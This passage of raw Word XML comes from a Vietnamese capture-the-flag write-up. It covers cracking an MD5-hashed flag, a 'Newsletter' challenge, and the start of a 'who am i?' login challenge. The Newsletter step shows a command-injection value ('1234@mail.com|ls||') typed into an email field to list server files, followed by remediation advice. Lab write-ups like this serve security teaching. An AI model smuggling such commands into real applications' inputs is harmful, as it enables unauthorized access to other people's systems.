          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="166F23EC" wp14:editId="40C1DA6B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-471</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5410200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="927100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="927100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="296974A8"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t>Figure 7: Hình ảnh flag đã được mã hóa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAD154A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 2: Tìm flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0416A3EF" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Flag trên đã được hash bằng MD5, ta tiến hành dùng công tool có sẵn trên mạng để giải mã và đây là kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739BB873" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38000F8F" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7561BD7C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41AF2466"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8: Hình ảnh giải mã flag</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="67E511DC" wp14:editId="59EB20B4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>675803</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>115258</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4762500" cy="3876675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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4762500" cy="3876675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77143BB0"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Flag: badboy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E42B896"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Khuyến cáo: xoá các thông tin nhạy cảm và xài hàm băm mạnh hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B030D4" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_heading=h.mmfkh8mthtot" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản Newsletter</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="19" w:name="_heading=h.jx24uvx5hjew" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="19" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_13"/>
        <w:id w:val="1631358916"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="424E02CB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:color w:val="212120"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:color w:val="212120"/>
            </w:rPr>
            <w:t>Newsletter - data</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="45CDEE0D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện gửi gói tin để có thể truy cập các thông tin bên trong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08324D6E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mô tả </w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="_heading=h.lakm12jr3o5x" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="20" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_14"/>
        <w:id w:val="-1427341273"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="0CD12D3C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:color w:val="212120"/>
            </w:rPr>
            <w:t>Tài nguyên:</w:t>
          </w:r>
          <w:hyperlink r:id="rId37">
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="212120"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:color w:val="1155CC"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:t>https://md5decrypt.net/en/</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkStart w:id="21" w:name="_heading=h.w5tlonezfg4f" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="21" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_15"/>
        <w:id w:val="-1231531239"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="4FC11A15" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:spacing w:before="360" w:after="80" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Đầu tiên ta sẽ thực hiện nhập ngẫu nhiên một thông tin gì đó</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="3E1275D0"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2C5275EE" wp14:editId="7282EB72">
            <wp:extent cx="6114105" cy="2959100"/>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6114105" cy="2959100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="653E92C3" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tiếp theo xem lại các thông tin tham khảo để xem có hỗ trợ gì không thì ta thấy được có thể liệt kê các thông tin trong file bằng ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9139C1"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238F7944" wp14:editId="522BDB20">
            <wp:extent cx="6114105" cy="1409700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1409700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A615EB4" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta sẽ thực hiện thay đổi gói tin ở trường email thành </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r w:rsidRPr="007913DC">
          <w:rPr>
            <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>1234@mail.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">|ls|| và ta có được </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="647B0511"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77824804" wp14:editId="5C11C926">
            <wp:extent cx="6114105" cy="4013200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="4013200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7E49AC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>flag: hgdr64.backup.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD25ED" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Khuyến cáo: lọc đầu vào gói tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1804B1CB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0725712C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_heading=h.b5yzmau2faag" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản who am i?</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="23" w:name="_heading=h.ck8xcs1irc19" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="23" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_16"/>
        <w:id w:val="1287933977"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="42734FD8" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:color w:val="212120"/>
            </w:rPr>
          </w:pPr>
          <w:proofErr w:type="gramStart"/>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:color w:val="212120"/>
            </w:rPr>
            <w:t>who am i</w:t>
          </w:r>
          <w:proofErr w:type="gramEnd"/>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:color w:val="212120"/>
            </w:rPr>
            <w:t>? - data, information</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5CCAE769" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện chỉnh sửa gói tin để vào trang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1C8E18"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bookmarkStart w:id="24" w:name="_heading=h.5d98exvrx327" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="24" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_17"/>
        <w:id w:val="818388606"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="35841E96" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:color w:val="404040"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:color w:val="212120"/>
            </w:rPr>
            <w:t>Tài nguyên:</w:t>
          </w:r>
          <w:hyperlink r:id="rId42">
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="212120"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:color w:val="1155CC"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:t xml:space="preserve">https://www.base64encode.org/ </w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="289641AD" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 1: Vào trang web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276253E1" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tiến hành vào trang web và xem mã nguồn trang.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0238A3E7" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F47B21" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B249342" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35321588" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D70D1FB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C346047" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="315E8ED9" wp14:editId="139ADEB8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-15239</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>323850</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="3594100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3594100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="105E5252"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9: Hình ảnh trang web và 1 phần mã nguồn trang web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D88D50E"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Ta thử login vào trang web thì phát hiện với user Guest thì chưa đủ quyền để thao tác thêm (hình 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55623594"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10: Hình ảnh sau khi login</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="375F020D" wp14:editId="52DE71F5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-15239</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>127032</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="2565400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="18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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="2565400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
